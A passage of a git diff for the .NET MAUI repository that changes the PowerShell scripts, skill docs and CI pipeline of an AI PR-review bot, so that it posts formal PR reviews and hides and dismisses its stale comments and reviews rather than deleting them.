variable=aiSummaryReviewId;isOutput=true]DEFERRED" } else { # Post PR review phases (pre-flight, try-fix, report) -$aiSummaryCommentId = $null +$aiSummaryReviewId = $null +$aiSummaryReviewNodeId = $null $reviewScript = Join-Path $summaryScriptsDir "post-ai-summary-comment.ps1" if (Test-Path $reviewScript) { try { @@ -1669,20 +1670,28 @@ if (Test-Path $reviewScript) { } else { $reviewOutput = & $reviewScript -PRNumber $PRNumber } - # Capture comment ID from script output (format: COMMENT_ID=) - $idLine = $reviewOutput | Where-Object { $_ -match '^COMMENT_ID=' } | Select-Object -Last 1 - if ($idLine -match '^COMMENT_ID=(\d+)$') { - $aiSummaryCommentId = $Matches[1] - Write-Host " ✅ PR review summary posted (comment ID: $aiSummaryCommentId)" -ForegroundColor Green + # Capture review ID from script output (format: AI_SUMMARY_REVIEW_ID=) + $idLine = $reviewOutput | Where-Object { $_ -match '^AI_SUMMARY_REVIEW_ID=' } | Select-Object -Last 1 + $nodeLine = $reviewOutput | Where-Object { $_ -match '^AI_SUMMARY_REVIEW_NODE_ID=' } | Select-Object -Last 1 + if ($idLine -match '^AI_SUMMARY_REVIEW_ID=(\d+)$') { + $aiSummaryReviewId = $Matches[1] + if ($nodeLine -match '^AI_SUMMARY_REVIEW_NODE_ID=(.+)$') { + $aiSummaryReviewNodeId = $Matches[1] + } + Write-Host " ✅ PR review summary posted (review ID: $aiSummaryReviewId)" -ForegroundColor Green - # Persist comment ID + PR number to a known location and emit + # Persist review ID + PR number to a known location and emit # as an output variable so the downstream UpdateAISummaryComment - # stage in ci-copilot.yml can rewrite the UI tests section once + # stage in ci-copilot.yml can rewrite the review body once # the deep UI tests finish on the platform-pool agents. - $commentIdFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/ai-summary-comment-id.txt" - New-Item -ItemType Directory -Force -Path (Split-Path -Parent $commentIdFile) | Out-Null - $aiSummaryCommentId | Set-Content $commentIdFile -Encoding UTF8 - Write-Host "##vso[task.setvariable variable=aiSummaryCommentId;isOutput=true]$aiSummaryCommentId" + $reviewIdFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/ai-summary-review-id.txt" + New-Item -ItemType Directory -Force -Path (Split-Path -Parent $reviewIdFile) | Out-Null + $aiSummaryReviewId | Set-Content $reviewIdFile -Encoding UTF8 + if (-not [string]::IsNullOrWhiteSpace($aiSummaryReviewNodeId)) { + $aiSummaryReviewNodeId | Set-Content (Join-Path (Split-Path -Parent $reviewIdFile) "ai-summary-review-node-id.txt") -Encoding UTF8 + Write-Host "##vso[task.setvariable variable=aiSummaryReviewNodeId;isOutput=true]$aiSummaryReviewNodeId" + } + Write-Host "##vso[task.setvariable variable=aiSummaryReviewId;isOutput=true]$aiSummaryReviewId" } else { Write-Host " ✅ PR review summary posted" -ForegroundColor Green } @@ -1693,7 +1702,7 @@ if (Test-Path $reviewScript) { Write-Host " ⚠️ post-ai-summary-comment.ps1 not found — skipping review summary" -ForegroundColor Yellow } -} # END DEFER_COMMENT_TO_STAGE3 else block (summary comment only — inline findings + labels always run below) +} # END DEFER_COMMENT_TO_STAGE3 else block (summary review only — inline findings + labels always run below) # Determine winning candidate (winner.json) — drives whether we post inline findings or request changes $winnerFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/winner.json" @@ -1730,8 +1739,8 @@ if (Test-Path $winnerFile) { $isPRWinner = (-not $winner) -or ($winner.isPRFix -eq $true) -if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { - Remove-StaleMauiBotIssueComments ` +if (Get-Command Hide-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Hide-StaleMauiBotIssueComments ` -PRNumber $PRNumber ` -IncludeTryFix ` -Reason "stale try-fix notice" @@ -1830,6 +1839,15 @@ $( if ($truncated) { "`n_The diff was truncated to fit GitHub's review body limi $resp = & gh api -X POST "repos/dotnet/maui/pulls/$PRNumber/reviews" --input $tmp 2>&1 Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue if ($LASTEXITCODE -eq 0) { + $tryFixReview = (($resp -join [Environment]::NewLine) | ConvertFrom-Json) + $tryFixDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" + New-Item -ItemType Directory -Force -Path $tryFixDir | Out-Null + if ($tryFixReview.id) { + [string]$tryFixReview.id | Set-Content (Join-Path $tryFixDir "try-fix-review-id.txt") -Encoding UTF8 + } + if ($tryFixReview.node_id) { + [string]$tryFixReview.node_id | Set-Content (Join-Path $tryFixDir "try-fix-review-node-id.txt") -Encoding UTF8 + } Write-Host " ✅ REQUEST_CHANGES review submitted" -ForegroundColor Green } else { Write-Host " ⚠️ Failed to submit REQUEST_CHANGES review (non-fatal): $resp" -ForegroundColor Yellow diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 9f9f691de062..2add8afa6c8e 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -1,13 +1,13 @@ #!/usr/bin/env pwsh <# .SYNOPSIS - Posts the AI review summary comment on a GitHub Pull Request. + Posts the AI review summary as a GitHub Pull Request review. .DESCRIPTION - Maintains ONE comment per PR, identified by marker. - Before posting a fresh comment, any older generated AI Summary comments are - removed. The replacement comment contains only the latest review session, - keyed by the current HEAD commit SHA. + Creates a new PR review per run, identified by marker. + Before posting a fresh review, older generated AI Summary artifacts are + hidden as outdated. The replacement review contains only the latest review + session, keyed by the current HEAD commit SHA. After posting, the PR author is @-mentioned so they know to review. @@ -16,18 +16,18 @@ CustomAgentLogsTmp/PRState//PRAgent/{pre-flight,try-fix,report}/content.md CustomAgentLogsTmp/PRState//PRAgent/pre-flight/code-review.md - Gate is included as a section inside this unified comment — the script may + Gate is included as a section inside this unified review body — the script may be called by Review-PR.ps1 twice per run: once after the gate completes (gate-only update) and once after the review phases finish (full update). Any standalone legacy "" comment from older versions of - the script is deleted before the fresh comment is posted to avoid duplicates. + the script is hidden before the fresh review is posted to avoid duplicates. .PARAMETER PRNumber The pull request number (required) .PARAMETER DryRun - Print comment instead of posting + Print review body instead of posting .EXAMPLE ./post-ai-summary-comment.ps1 -PRNumber 12345 @@ -107,6 +107,82 @@ function Test-PhaseContentIsNoOp { } } +function Get-AIReviewEvent { + param([string]$ReportContent) + + if ([string]::IsNullOrWhiteSpace($ReportContent)) { + return 'COMMENT' + } + + $normalized = $ReportContent -replace "`r`n", "`n" + if ($normalized -match '(?im)^\s*(?:##\s*)?(?:✅\s*)?Final\s+Recommendation:\s*APPROVE\s*$') { + return 'APPROVE' + } + + if ($normalized -match '(?im)^\s*(?:##\s*)?(?:⚠️\s*)?Final\s+Recommendation:\s*REQUEST\s+CHANGES\s*$') { + return 'REQUEST_CHANGES' + } + + return 'COMMENT' +} + +function Get-PreservedMauiBotNodeIds { + param([Parameter(Mandatory = $true)][string]$PRAgentDir) + + $files = @( + 'try-fix-review-node-id.txt', + 'ai-summary-review-node-id.txt', + 'current-review-node-ids.txt' + ) + + $nodeIds = @() + foreach ($file in $files) { + $path = Join-Path $PRAgentDir $file + if (-not (Test-Path $path)) { + continue + } + + $nodeIds += Get-Content $path -Encoding UTF8 | ForEach-Object { + $value = [string]$_ + if (-not [string]::IsNullOrWhiteSpace($value)) { + $value.Trim() + } + } + } + + return @($nodeIds | Where-Object { -not [string]::IsNullOrWhiteSpace($_) } | Select-Object -Unique) +} + +function Invoke-PostPullRequestReview { + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [Parameter(Mandatory = $true)] + [string]$Body, + + [Parameter(Mandatory = $true)] + [ValidateSet('APPROVE', 'REQUEST_CHANGES', 'COMMENT')] + [string]$Event + ) + + $tempFile = [System.IO.Path]::GetTempFileName() + try { + @{ body = $Body; event = $Event } | + ConvertTo-Json -Depth 10 | + Set-Content -Path $tempFile -Encoding UTF8 + + $response = gh api --method POST "repos/dotnet/maui/pulls/$PRNumber/reviews" --input $tempFile 2>&1 + if ($LASTEXITCODE -ne 0) { + throw "POST review failed (exit code $LASTEXITCODE): $response" + } + + return (($response -join [Environment]::NewLine) | ConvertFrom-Json) + } finally { + Remove-Item $tempFile -ErrorAction SilentlyContinue + } +} + # ─── Gate content (rendered first, always open) ─── $gateSection = $null $gateFilePath = Join-Path $PRAgentDir "gate/content.md" @@ -131,6 +207,7 @@ $gateContent } $phaseSections = @() +$phaseContentByKey = @{} foreach ($key in $phases.Keys) { $phase = $phases[$key] @@ -144,6 +221,7 @@ foreach ($key in $phases.Keys) { continue } + $phaseContentByKey[$key] = $content Write-Host " ✅ $key ($((Get-Item $filePath).Length) bytes)" -ForegroundColor Green # For uitests, make title dynamic: "UI Tests — Cat1, Cat2" $phaseTitle = "$($phase.Icon) $($phase.Title)" @@ -174,6 +252,9 @@ if (-not $gateSection -and $phaseSections.Count -eq 0) { throw "No gate or phase content found. Ensure at least one of gate/content.md or {phase}/content.md exists in $PRAgentDir." } +$reviewEvent = Get-AIReviewEvent -ReportContent $phaseContentByKey['report'] +Write-Host " 🧾 PR review event: $reviewEvent" -ForegroundColor Cyan + # ============================================================================ # FETCH PR METADATA (commit + author) # ============================================================================ @@ -227,11 +308,12 @@ $sessionMarkerEnd "@ # ============================================================================ -# FIND EXISTING COMMENT & BUILD FINAL BODY +# FIND EXISTING AI SUMMARY ARTIFACTS & BUILD FINAL BODY # ============================================================================ -Write-Host "Checking for existing review comment..." -ForegroundColor Yellow +Write-Host "Checking for existing AI Summary artifacts..." -ForegroundColor Yellow $existingCommentIds = @() +$existingReviewIds = @() $existingBodies = @() $existingRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null @@ -242,7 +324,16 @@ if ($existingRaw) { if ($existingObjs.Count -gt 0) { $existingCommentIds = @($existingObjs | ForEach-Object { $_.id }) $existingBodies = @($existingObjs | ForEach-Object { [string]$_.body }) - Write-Host "✓ Found existing AI Summary comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green + Write-Host "✓ Found existing AI Summary issue comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green + } + + if (Get-Command Get-GitHubPullRequestReviews -ErrorAction SilentlyContinue) { + $existingReviewObjs = @(Get-GitHubPullRequestReviews -PRNumber $PRNumber | Where-Object { $_.body -and $_.body.Contains($MARKER) }) + if ($existingReviewObjs.Count -gt 0) { + $existingReviewIds = @($existingReviewObjs | ForEach-Object { $_.id }) + $existingBodies += @($existingReviewObjs | ForEach-Object { [string]$_.body }) + Write-Host "✓ Found existing AI Summary review(s): $($existingReviewIds -join ', ')" -ForegroundColor Green + } } } catch { Write-Host "⚠️ Could not parse comments: $_" -ForegroundColor Yellow @@ -278,7 +369,7 @@ $newSessionBlock$finalizeSection # Clean up excessive blank lines $commentBody = $commentBody -replace "`n{4,}", "`n`n`n" -Write-Host " ✅ Built comment ($($commentBody.Length) chars)" -ForegroundColor Green +Write-Host " ✅ Built review body ($($commentBody.Length) chars)" -ForegroundColor Green # ============================================================================ # DRY RUN @@ -286,6 +377,7 @@ Write-Host " ✅ Built comment ($($commentBody.Length) chars)" -ForegroundColor if ($DryRun) { Write-Host "" + Write-Host "Review event: $reviewEvent" -ForegroundColor Cyan Write-Host "=== COMMENT PREVIEW ===" -ForegroundColor Cyan Write-Host $commentBody Write-Host "=== END PREVIEW ===" -ForegroundColor Cyan @@ -293,35 +385,57 @@ if ($DryRun) { } # ============================================================================ -# DELETE STALE GENERATED COMMENTS, THEN POST COMMENT +# HIDE STALE GENERATED ARTIFACTS, THEN POST REVIEW # ============================================================================ -$tempFile = [System.IO.Path]::GetTempFileName() +$preserveNodeIds = Get-PreservedMauiBotNodeIds -PRAgentDir $PRAgentDir + +if (Get-Command Hide-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Hide-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeAISummary ` + -IncludeLegacyGate ` + -IncludeMergeConflict ` + -IncludeTryFix ` + -PreserveNodeIds $preserveNodeIds ` + -Reason "stale generated PR review artifact" +} + +if (Get-Command Hide-StaleMauiBotPullRequestReviews -ErrorAction SilentlyContinue) { + Hide-StaleMauiBotPullRequestReviews ` + -PRNumber $PRNumber ` + -IncludeAISummary ` + -IncludeTryFix ` + -PreserveNodeIds $preserveNodeIds ` + -Reason "stale generated PR review" ` + -DismissFormalReviews +} + +Write-Host "Creating new AI Summary PR review ($reviewEvent)..." -ForegroundColor Yellow +$postedEvent = $reviewEvent try { - @{ body = $commentBody } | ConvertTo-Json -Depth 10 | Set-Content -Path $tempFile -Encoding UTF8 - - if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { - Remove-StaleMauiBotIssueComments ` - -PRNumber $PRNumber ` - -IncludeAISummary ` - -IncludeLegacyGate ` - -IncludeMergeConflict ` - -IncludeTryFix ` - -Reason "stale generated PR review comment" + $review = Invoke-PostPullRequestReview -PRNumber $PRNumber -Body $commentBody -Event $postedEvent +} catch { + if ($postedEvent -eq 'COMMENT') { + throw } - if (Get-Command Dismiss-StaleMauiBotTryFixReviews -ErrorAction SilentlyContinue) { - Dismiss-StaleMauiBotTryFixReviews -PRNumber $PRNumber - } + Write-Host "⚠️ Formal $postedEvent review was rejected; retrying as COMMENT: $_" -ForegroundColor Yellow + $postedEvent = 'COMMENT' + $review = Invoke-PostPullRequestReview -PRNumber $PRNumber -Body $commentBody -Event $postedEvent +} - Write-Host "Creating new review comment..." -ForegroundColor Yellow - $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile - if ($LASTEXITCODE -ne 0) { - throw "Failed to post AI Summary comment" - } - $newId = ($newJson | ConvertFrom-Json).id - Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green - Write-Output "COMMENT_ID=$newId" -} finally { - Remove-Item $tempFile -ErrorAction SilentlyContinue +$reviewId = [string]$review.id +$reviewNodeId = [string]$review.node_id + +if (-not [string]::IsNullOrWhiteSpace($reviewId)) { + Set-Content -Path (Join-Path $PRAgentDir "ai-summary-review-id.txt") -Value $reviewId -Encoding UTF8 +} +if (-not [string]::IsNullOrWhiteSpace($reviewNodeId)) { + Set-Content -Path (Join-Path $PRAgentDir "ai-summary-review-node-id.txt") -Value $reviewNodeId -Encoding UTF8 } + +Write-Host "✅ AI Summary PR review posted (ID: $reviewId, event: $postedEvent)" -ForegroundColor Green +Write-Output "AI_SUMMARY_REVIEW_ID=$reviewId" +Write-Output "AI_SUMMARY_REVIEW_NODE_ID=$reviewNodeId" +Write-Output "AI_SUMMARY_REVIEW_EVENT=$postedEvent" diff --git a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 index 850801483647..c816ac000501 100644 --- a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 +++ b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 @@ -46,6 +46,85 @@ function Test-IsTryFixCommentBody { ($Body.Contains('try-fix-') -and $Body.Contains('Candidate diff')) } +function Test-IsAISummaryCommentBody { + param([string]$Body) + + if ([string]::IsNullOrWhiteSpace($Body)) { + return $false + } + + return $Body.Contains($script:AiSummaryCommentMarker) +} + +function Test-ShouldPreserveMauiBotArtifact { + param( + [object]$Artifact, + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @() + ) + + $nodeId = [string]$Artifact.node_id + $id = [string]$Artifact.id + + return ( + (-not [string]::IsNullOrWhiteSpace($nodeId) -and $PreserveNodeIds -contains $nodeId) -or + (-not [string]::IsNullOrWhiteSpace($id) -and $PreserveIds -contains $id) + ) +} + +function Invoke-GitHubMinimizeComment { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [string]$SubjectNodeId, + + [ValidateSet('SPAM', 'ABUSE', 'OFF_TOPIC', 'OUTDATED', 'DUPLICATE', 'RESOLVED', 'LOW_QUALITY')] + [string]$Classifier = 'OUTDATED', + + [string]$Reason = 'stale MauiBot artifact', + + [switch]$DryRun + ) + + if ([string]::IsNullOrWhiteSpace($SubjectNodeId)) { + Write-Host " Warning: cannot hide $Reason because node_id is empty" -ForegroundColor Yellow + return $false + } + + if ($DryRun) { + Write-Host " [DryRun] Would hide $Reason (node_id: $SubjectNodeId, classifier: $Classifier)" -ForegroundColor Magenta + return $true + } + + $query = @' +mutation MinimizeComment($subjectId: ID!, $classifier: ReportedContentClassifiers!) { + minimizeComment(input: { subjectId: $subjectId, classifier: $classifier }) { + minimizedComment { + isMinimized + minimizedReason + } + } +} +'@ + + try { + Write-Host " Hiding $Reason (node_id: $SubjectNodeId, classifier: $Classifier)..." -ForegroundColor Gray + $output = gh api graphql ` + -f query="$query" ` + -F subjectId="$SubjectNodeId" ` + -F classifier="$Classifier" 2>&1 + + if ($LASTEXITCODE -ne 0) { + throw "minimizeComment failed (exit code $LASTEXITCODE): $output" + } + + return $true + } catch { + Write-Host " Warning: could not hide $Reason with node_id ${SubjectNodeId}: $_" -ForegroundColor Yellow + return $false + } +} + function Get-GitHubIssueComments { param([Parameter(Mandatory = $true)][int]$PRNumber) @@ -62,7 +141,7 @@ function Get-GitHubIssueComments { } } -function Remove-StaleMauiBotIssueComments { +function Hide-StaleMauiBotIssueComments { [CmdletBinding()] param( [Parameter(Mandatory = $true)] @@ -73,6 +152,12 @@ function Remove-StaleMauiBotIssueComments { [switch]$IncludeMergeConflict, [switch]$IncludeTryFix, + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @(), + + [ValidateSet('SPAM', 'ABUSE', 'OFF_TOPIC', 'OUTDATED', 'DUPLICATE', 'RESOLVED', 'LOW_QUALITY')] + [string]$Classifier = 'OUTDATED', + [string]$Reason = 'stale MauiBot comment', [switch]$DryRun ) @@ -84,13 +169,17 @@ function Remove-StaleMauiBotIssueComments { $staleComments = @() foreach ($comment in $comments) { + if (Test-ShouldPreserveMauiBotArtifact -Artifact $comment -PreserveNodeIds $PreserveNodeIds -PreserveIds $PreserveIds) { + continue + } + $body = [string]$comment.body if ([string]::IsNullOrWhiteSpace($body)) { continue } $matchesGeneratedMarker = - ($IncludeAISummary -and $body.Contains($script:AiSummaryCommentMarker)) -or + ($IncludeAISummary -and (Test-IsAISummaryCommentBody $body)) -or ($IncludeLegacyGate -and $body.Contains($script:AiGateCommentMarker)) $matchesBotOnlyContent = @@ -105,23 +194,48 @@ function Remove-StaleMauiBotIssueComments { } foreach ($comment in $staleComments) { - if ($DryRun) { - Write-Host " [DryRun] Would delete $Reason (comment ID: $($comment.id))" -ForegroundColor Magenta - continue - } - - try { - Write-Host " Deleting $Reason (comment ID: $($comment.id))..." -ForegroundColor Gray - $deleteOutput = gh api --method DELETE "repos/dotnet/maui/issues/comments/$($comment.id)" 2>&1 - if ($LASTEXITCODE -ne 0) { - throw "DELETE failed (exit code $LASTEXITCODE): $deleteOutput" - } - } catch { - Write-Host " Warning: could not delete $Reason comment $($comment.id): $_" -ForegroundColor Yellow - } + Invoke-GitHubMinimizeComment ` + -SubjectNodeId ([string]$comment.node_id) ` + -Classifier $Classifier ` + -Reason "$Reason comment $($comment.id)" ` + -DryRun:$DryRun | Out-Null } } +function Remove-StaleMauiBotIssueComments { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [switch]$IncludeAISummary, + [switch]$IncludeLegacyGate, + [switch]$IncludeMergeConflict, + [switch]$IncludeTryFix, + + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @(), + + [ValidateSet('SPAM', 'ABUSE', 'OFF_TOPIC', 'OUTDATED', 'DUPLICATE', 'RESOLVED', 'LOW_QUALITY')] + [string]$Classifier = 'OUTDATED', + + [string]$Reason = 'stale MauiBot comment', + [switch]$DryRun + ) + + Hide-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeAISummary:$IncludeAISummary ` + -IncludeLegacyGate:$IncludeLegacyGate ` + -IncludeMergeConflict:$IncludeMergeConflict ` + -IncludeTryFix:$IncludeTryFix ` + -PreserveNodeIds $PreserveNodeIds ` + -PreserveIds $PreserveIds ` + -Classifier $Classifier ` + -Reason $Reason ` + -DryRun:$DryRun +} + function Get-GitHubPullRequestReviews { param([Parameter(Mandatory = $true)][int]$PRNumber) @@ -138,13 +252,63 @@ function Get-GitHubPullRequestReviews { } } -function Dismiss-StaleMauiBotTryFixReviews { +function Dismiss-MauiBotPullRequestReview { [CmdletBinding()] param( [Parameter(Mandatory = $true)] [int]$PRNumber, - [string]$Reason = 'superseded MauiBot try-fix review', + [Parameter(Mandatory = $true)] + [object]$Review, + + [string]$Reason = 'Superseded by a newer MauiBot review run.', + [switch]$DryRun + ) + + if ($DryRun) { + Write-Host " [DryRun] Would dismiss stale review ID $($Review.id)" -ForegroundColor Magenta + return $true + } + + $tmp = New-TemporaryFile + try { + @{ message = $Reason } | + ConvertTo-Json -Compress | + Set-Content -LiteralPath $tmp -Encoding UTF8 -NoNewline + + Write-Host " Dismissing stale review ID $($Review.id)..." -ForegroundColor Gray + $dismissOutput = gh api --method PUT "repos/dotnet/maui/pulls/$PRNumber/reviews/$($Review.id)/dismissals" --input $tmp.FullName 2>&1 + if ($LASTEXITCODE -ne 0) { + throw "dismissal failed (exit code $LASTEXITCODE): $dismissOutput" + } + + return $true + } catch { + Write-Host " Warning: could not dismiss review $($Review.id): $_" -ForegroundColor Yellow + return $false + } finally { + Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue + } +} + +function Hide-StaleMauiBotPullRequestReviews { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [switch]$IncludeAISummary, + [switch]$IncludeTryFix, + + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @(), + + [ValidateSet('SPAM', 'ABUSE', 'OFF_TOPIC', 'OUTDATED', 'DUPLICATE', 'RESOLVED', 'LOW_QUALITY')] + [string]$Classifier = 'OUTDATED', + + [string]$Reason = 'stale MauiBot review', + [switch]$DismissChangesRequested, + [switch]$DismissFormalReviews, [switch]$DryRun ) @@ -153,33 +317,68 @@ function Dismiss-StaleMauiBotTryFixReviews { return } - $staleReviews = @($reviews | Where-Object { - (Test-IsMauiBotCommentAuthor $_) -and - ([string]$_.state -ieq 'CHANGES_REQUESTED') -and - (Test-IsTryFixCommentBody ([string]$_.body)) - }) + $staleReviews = @() + foreach ($review in $reviews) { + if (Test-ShouldPreserveMauiBotArtifact -Artifact $review -PreserveNodeIds $PreserveNodeIds -PreserveIds $PreserveIds) { + continue + } - foreach ($review in $staleReviews) { - if ($DryRun) { - Write-Host " [DryRun] Would dismiss $Reason (review ID: $($review.id))" -ForegroundColor Magenta + $body = [string]$review.body + if ([string]::IsNullOrWhiteSpace($body) -or -not (Test-IsMauiBotCommentAuthor $review)) { continue } - $tmp = New-TemporaryFile - try { - @{ message = 'Superseded by a newer MauiBot review run.' } | - ConvertTo-Json -Compress | - Set-Content -LiteralPath $tmp -Encoding UTF8 -NoNewline - - Write-Host " Dismissing $Reason (review ID: $($review.id))..." -ForegroundColor Gray - $dismissOutput = gh api --method PUT "repos/dotnet/maui/pulls/$PRNumber/reviews/$($review.id)/dismissals" --input $tmp.FullName 2>&1 - if ($LASTEXITCODE -ne 0) { - throw "dismissal failed (exit code $LASTEXITCODE): $dismissOutput" - } - } catch { - Write-Host " Warning: could not dismiss $Reason review $($review.id): $_" -ForegroundColor Yellow - } finally { - Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue + $matchesReview = + ($IncludeAISummary -and (Test-IsAISummaryCommentBody $body)) -or + ($IncludeTryFix -and (Test-IsTryFixCommentBody $body)) + + if ($matchesReview) { + $staleReviews += $review } } + + foreach ($review in $staleReviews) { + Invoke-GitHubMinimizeComment ` + -SubjectNodeId ([string]$review.node_id) ` + -Classifier $Classifier ` + -Reason "$Reason review $($review.id)" ` + -DryRun:$DryRun | Out-Null + + $reviewState = [string]$review.state + $shouldDismiss = + ($DismissFormalReviews -and $reviewState -in @('APPROVED', 'CHANGES_REQUESTED')) -or + ($DismissChangesRequested -and $reviewState -ieq 'CHANGES_REQUESTED') + + if ($shouldDismiss) { + Dismiss-MauiBotPullRequestReview ` + -PRNumber $PRNumber ` + -Review $review ` + -Reason 'Superseded by a newer MauiBot review run.' ` + -DryRun:$DryRun | Out-Null + } + } +} + +function Dismiss-StaleMauiBotTryFixReviews { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @(), + + [string]$Reason = 'superseded MauiBot try-fix review', + [switch]$DryRun + ) + + Hide-StaleMauiBotPullRequestReviews ` + -PRNumber $PRNumber ` + -IncludeTryFix ` + -PreserveNodeIds $PreserveNodeIds ` + -PreserveIds $PreserveIds ` + -Classifier OUTDATED ` + -Reason $Reason ` + -DismissChangesRequested ` + -DryRun:$DryRun } diff --git a/.github/skills/code-review/SKILL.md b/.github/skills/code-review/SKILL.md index 1a8d1bb0b37b..dc252d78a705 100644 --- a/.github/skills/code-review/SKILL.md +++ b/.github/skills/code-review/SKILL.md @@ -200,13 +200,13 @@ pwsh .github/scripts/post-inline-review.ps1 -PRNumber -DryRun pwsh .github/scripts/post-inline-review.ps1 -PRNumber ``` -**Wall-of-text summary** (phase content assembled into a single PR comment): +**Wall-of-text summary** (phase content assembled into a PR review body): ```bash # Called by Review-PR.ps1 automatically: pwsh .github/scripts/post-ai-summary-comment.ps1 ``` -In CI (`eng/pipelines/ci-copilot.yml`), `Review-PR.ps1` calls both `post-inline-review.ps1` (for inline findings) and `post-ai-summary-comment.ps1` (for the wall-of-text from `{phase}/content.md` files), using `GH_COMMENT_TOKEN`. +In CI (`eng/pipelines/ci-copilot.yml`), `Review-PR.ps1` calls both `post-inline-review.ps1` (for inline findings) and `post-ai-summary-comment.ps1` (for the wall-of-text from `{phase}/content.md` files), using `GH_COMMENT_TOKEN`. The trusted posting script may submit `APPROVE` or `REQUEST_CHANGES` from the final recommendation; the agent itself must not run review commands directly. --- diff --git a/.github/skills/find-regression-risk/SKILL.md b/.github/skills/find-regression-risk/SKILL.md index 506e1ff74634..d458232359e8 100644 --- a/.github/skills/find-regression-risk/SKILL.md +++ b/.github/skills/find-regression-risk/SKILL.md @@ -49,7 +49,7 @@ When `-OutputDir` is specified: ## Integration -The script runs as **STEP 4** in `Review-PR.ps1` (Regression Cross-Reference, after UI test detection and before the Gate step). Its `content.md` is assembled into the AI summary comment by `post-ai-summary-comment.ps1`. +The script runs as **STEP 4** in `Review-PR.ps1` (Regression Cross-Reference, after UI test detection and before the Gate step). Its `content.md` is assembled into the AI summary review by `post-ai-summary-comment.ps1`. When REVERT risks are detected, the regression tests from the reverted fix PRs are executed: - **UI tests** → `BuildAndRunHostApp.ps1 -Platform -TestFilter ` diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index ebce013b91ea..996e5e3f4e97 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -731,7 +731,7 @@ stages: fi echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/" - name: RunPost # Stage 3 (UpdateAISummaryComment) reads aiSummaryCommentId via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId']). Note: detectedCategories comes from RunGate, not RunPost. + name: RunPost # Stage 3 (UpdateAISummaryComment) reads aiSummaryReviewId via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryReviewId']). Note: detectedCategories comes from RunGate, not RunPost. displayName: 'Task 4: Post (comments + labels)' env: GH_TOKEN: $(GH_COMMENT_TOKEN) @@ -806,7 +806,7 @@ stages: # STAGE: RunDeepUITests # ───────────────────────────────────────────────────────────────────────────── # After the Copilot review agent has detected UI test categories and posted - # an initial AI summary comment with in-process per-category results, this + # an initial AI summary review with in-process per-category results, this # stage re-runs those same categories on a real platform-appropriate pool # (Tahoe iOS sim / Ubuntu Android emu / Windows-2022 / macOS-14) instead of # whatever VM the Copilot agent happened to land on. Each category becomes @@ -1272,7 +1272,7 @@ stages: } if ($hadFailure) { - # Don't fail the stage — the AI summary comment is the + # Don't fail the stage — the AI summary review is the # deliverable; failed tests get reported there. Stage-level # failure would prevent the UpdateAISummaryComment stage # from running. @@ -1304,26 +1304,26 @@ stages: # STAGE: PostAISummaryComment # ───────────────────────────────────────────────────────────────────────────── # Final stage. Depends on both ReviewPR (which posted the initial AI - # summary comment and emitted aiSummaryCommentId) and RunDeepUITests + # summary review and emitted aiSummaryReviewId) and RunDeepUITests # (which produced the TRX artifacts on the right pool). Downloads the # artifacts, parses them via Aggregate-UITestArtifacts.ps1, and edits - # the existing PR comment to replace the in-process STEP 3 section + # the existing PR review to replace the in-process STEP 3 section # with the deep-test results. - stage: UpdateAISummaryComment - displayName: 'Post AI Summary Comment' + displayName: 'Post AI Summary Review' dependsOn: - ReviewPR - RunDeepUITests - condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunPost.aiSummaryCommentId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed'))) + condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunPost.aiSummaryReviewId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed'))) jobs: - job: UpdateComment - displayName: 'Post AI summary with review + deep test results' + displayName: 